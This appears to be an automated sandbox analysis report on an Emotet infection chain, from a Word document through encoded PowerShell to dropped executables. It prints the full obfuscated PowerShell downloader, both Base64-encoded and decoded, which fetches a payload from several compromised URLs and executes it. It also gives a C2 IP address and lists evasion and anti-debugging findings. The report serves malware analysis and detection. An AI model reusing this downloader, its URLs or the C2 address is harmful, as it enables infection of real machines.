Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\633.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\633.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\inettimeout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\inettimeout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\System32\inettimeout.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4626
Source: C:\Users\user\633.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4580
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\633.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_003DE20C
Source: C:\Windows\System32\inettimeout.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,6_2_003BE20C
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Users\user\633.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-37862
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\633.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-38277
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\633.exeAPI coverage: 6.7 %
Source: C:\Windows\System32\inettimeout.exeAPI coverage: 9.1 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\633.exe TID: 2324Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Users\user\633.exe TID: 2324Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\inettimeout.exe TID: 2144Thread sleep time: -60000s >= -30000sJump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\633.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\633.exeCode function: 3_2_0042A28A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_0042A28A
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Program exit pointsShow sources
Source: C:\Users\user\633.exeAPI call chain: ExitProcess graph end nodegraph_3-38388
Source: C:\Users\user\633.exeAPI call chain: ExitProcess graph end nodegraph_4-4525
Source: C:\Windows\System32\inettimeout.exeAPI call chain: ExitProcess graph end nodegraph_5-4563
Source: C:\Windows\System32\inettimeout.exeAPI call chain: ExitProcess graph end nodegraph_6-4510
Source: C:\Windows\System32\inettimeout.exeAPI call chain: ExitProcess graph end nodegraph_6-4520
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0042E4E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042E4E6
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00418120 GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_00418120
Contains functionality to read the PEBShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00416BA0 mov eax, dword ptr fs:[00000030h]3_2_00416BA0
Source: C:\Users\user\633.exeCode function: 3_2_00240467 mov eax, dword ptr fs:[00000030h]3_2_00240467
Source: C:\Users\user\633.exeCode function: 3_2_00241743 mov eax, dword ptr fs:[00000030h]3_2_00241743
Source: C:\Users\user\633.exeCode function: 3_2_00240C0C mov eax, dword ptr fs:[00000030h]3_2_00240C0C
Source: C:\Users\user\633.exeCode function: 3_2_002612CD mov eax, dword ptr fs:[00000030h]3_2_002612CD
Source: C:\Users\user\633.exeCode function: 3_2_00261E04 mov eax, dword ptr fs:[00000030h]3_2_00261E04
Source: C:\Users\user\633.exeCode function: 4_2_003B0C0C mov eax, dword ptr fs:[00000030h]4_2_003B0C0C
Source: C:\Users\user\633.exeCode function: 4_2_003B0467 mov eax, dword ptr fs:[00000030h]4_2_003B0467
Source: C:\Users\user\633.exeCode function: 4_2_003B1743 mov eax, dword ptr fs:[00000030h]4_2_003B1743
Source: C:\Users\user\633.exeCode function: 4_2_003D1E04 mov eax, dword ptr fs:[00000030h]4_2_003D1E04
Source: C:\Users\user\633.exeCode function: 4_2_003D12CD mov eax, dword ptr fs:[00000030h]4_2_003D12CD
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B0467 mov eax, dword ptr fs:[00000030h]5_2_005B0467
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B0C0C mov eax, dword ptr fs:[00000030h]5_2_005B0C0C
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B1743 mov eax, dword ptr fs:[00000030h]5_2_005B1743
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005D1E04 mov eax, dword ptr fs:[00000030h]5_2_005D1E04
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005D12CD mov eax, dword ptr fs:[00000030h]5_2_005D12CD
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_00200C0C mov eax, dword ptr fs:[00000030h]6_2_00200C0C
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_00200467 mov eax, dword ptr fs:[00000030h]6_2_00200467
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_00201743 mov eax, dword ptr fs:[00000030h]6_2_00201743
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1E04 mov eax, dword ptr fs:[00000030h]6_2_003B1E04
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B12CD mov eax, dword ptr fs:[00000030h]6_2_003B12CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0042FD49 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,3_2_0042FD49
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\633.exeCode function: 3_2_0043850D SetUnhandledExceptionFilter,__encode_pointer,3_2_0043850D
Source: C:\Users\user\633.exeCode function: 3_2_0042E4E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042E4E6
Source: C:\Users\user\633.exeCode function: 3_2_0043852F __decode_pointer,SetUnhandledExceptionFilter,3_2_0043852F
Source: C:\Users\user\633.exeCode function: 3_2_0043501E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043501E
Source: C:\Users\user\633.exeCode function: 3_2_0042D316 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042D316

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Wapxpfok='Tkxuccbust';$Itacnulq = '633';$Cactbhkkupc='Nmvzutsbixwf';$Dvdjlfjeq=$env:userprofile+'\'+$Itacnulq+'.exe';$Sqxrndmnwn='Dmayuunhppz';$Buglztfdh=.('new-obj'+'e'+'ct') nET.WeBcLIENt;$Dxyglgycuk='https://luislar68.000webhostapp.com/wp-admin/6xr5u-1xog-29595/*http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/*https://fa.khanneshinhotel.ir/wp-content/4t1l-arjubdm39c-2426433731/*http://littlegreenwheel.com/wp-admin/20pav0-957-1402700868/*https://rawdahtrust.org/rprlq/sxttm-hugpwh1-171/'."S`plit"([char]42);$Waludfnbwruwx='Iaphnhqf';foreach($Jvteufwl in $Dxyglgycuk){try{$Buglztfdh."DOwNl`Oa`df`ile"($Jvteufwl, $Dvdjlfjeq);$Dbssvcqesq='Tthylhvg';If ((.('Get-'+'It'+'em') $Dvdjlfjeq)."lEn`GTH" -ge 21645) {([wmiclass]'win32_Process')."c`RE`AtE"($Dvdjlfjeq);$Jyparfrgu='Aevibodsfy';break;$Gvzpwjkuh='Iufczzbkhqit'}}catch{}}$Cfgcjrhi='Espvxjpdt'
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\633.exeProcess created: C:\Users\user\633.exe --4bc37bcaJump to behavior
Source: C:\Windows\System32\inettimeout.exeProcess created: C:\Windows\System32\inettimeout.exe --597fd3a1Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABXAGEAcAB4AHAAZgBvAGsAPQAnAFQAawB4AHUAYwBjAGIAdQBzAHQAJwA7ACQASQB0AGEAYwBuAHUAbABxACAAPQAgACcANgAzADMAJwA7ACQAQwBhAGMAdABiAGgAawBrAHUAcABjAD0AJwBOAG0AdgB6AHUAdABzAGIAaQB4AHcAZgAnADsAJABEAHYAZABqAGwAZgBqAGUAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQB0AGEAYwBuAHUAbABxACsAJwAuAGUAeABlACcAOwAkAFMAcQB4AHIAbgBkAG0AbgB3AG4APQAnAEQAbQBhAHkAdQB1AG4AaABwAHAAegAnADsAJABCAHUAZwBsAHoAdABmAGQAaAA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQARAB4AHkAZwBsAGcAeQBjAHUAawA9ACcAaAB0AHQAcABzADoALwAvAGwAdQBpAHMAbABhAHIANgA4AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgB4AHIANQB1AC0AMQB4AG8AZwAtADIAOQA1ADkANQAvACoAaAB0AHQAcAA6AC8ALwBrAGgAbwBtAGEAeQBuAGgAbwBtAG4AaAB1AGEALgB2AG4ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAB5AGwAMwAxAHgAaQAtAG4AbQBmAGgALQA2ADQAMwA1ADQAMgAvACoAaAB0AHQAcABzADoALwAvAGYAYQAuAGsAaABhAG4AbgBlAHMAaABpAG4AaABvAHQAZQBsAC4AaQByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAdAAxAGwALQBhAHIAagB1AGIAZABtADMAOQBjAC0AMgA0ADIANgA0ADMAMwA3ADMAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAdAB0AGwAZQBnAHIAZQBlAG4AdwBoAGUAZQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyADAAcABhAHYAMAAtADkANQA3AC0AMQA0ADAAMgA3ADAAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQB3AGQAYQBoAHQAcgB1AHMAdAAuAG8AcgBnAC8AcgBwAHIAbABxAC8AcwB4AHQAdABtAC0AaAB1AGcAcAB3AGgAMQAtADEANwAxAC8AJwAuACIAUwBgAHAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAGEAbAB1AGQAZgBuAGIAdwByAHUAdwB4AD0AJwBJAGEAcABoAG4AaABxAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAdgB0AGUAdQBmAHcAbAAgAGkAbgAgACQARAB4AHkAZwBsAGcAeQBjAHUAawApAHsAdAByAHkAewAkAEIAdQBnAGwAegB0AGYAZABoAC4AIgBEAE8AdwBOAGwAYABPAGEAYABkAGYAYABpAGwAZQAiACgAJABKAHYAdABlAHUAZgB3AGwALAAgACQARAB2AGQAagBsAGYAagBlAHEAKQA7ACQARABiAHMAcwB2AGMAcQBlAHMAcQA9ACcAVAB0AGgAeQBsAGgAdgBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB2AGQAagBsAGYAagBlAHEAKQAuACIAbABFAG4AYABHAFQASAAiACAALQBnAGUAIAAyADEANgA0ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAYABBAHQARQAiACgAJABEAHYAZABqAGwAZgBqAGUAcQApADsAJABKAHkAcABhAHIAZgByAGcAdQA9ACcAQQBlAHYAaQBiAG8AZABzAGYAeQAnADsAYgByAGUAYQBrADsAJABHAHYAegBwAHcAagBrAHUAaAA9ACcASQB1AGYAYwB6AHoAYgBrAGgAcQBpAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBmAGcAYwBqAHIAaABpAD0AJwBFAHMAcAB2AHgAagBwAGQAdAAnAA==

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\633.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_00426F3D
Source: C:\Users\user\633.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_004418E2
Source: C:\Users\user\633.exeCode function: GetLocaleInfoA,3_2_0043DA95
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0043C94B cpuid 3_2_0043C94B
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\633.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\inettimeout.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\633.exeCode function: 3_2_0042E9F5 GetSystemTimeAsFileTime,__aulldiv,3_2_0042E9F5
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\633.exeCode function: 3_2_0043615F __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_0043615F
Contains functionality to query windows versionShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00404050 GetVersionExA,SystemParametersInfoA,RegOpenKeyExA,RegQueryValueExA,_strtoul,RegCloseKey,3_2_00404050
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\633.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["42.115.22.145/jHnnLdTLu1NRMhU"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet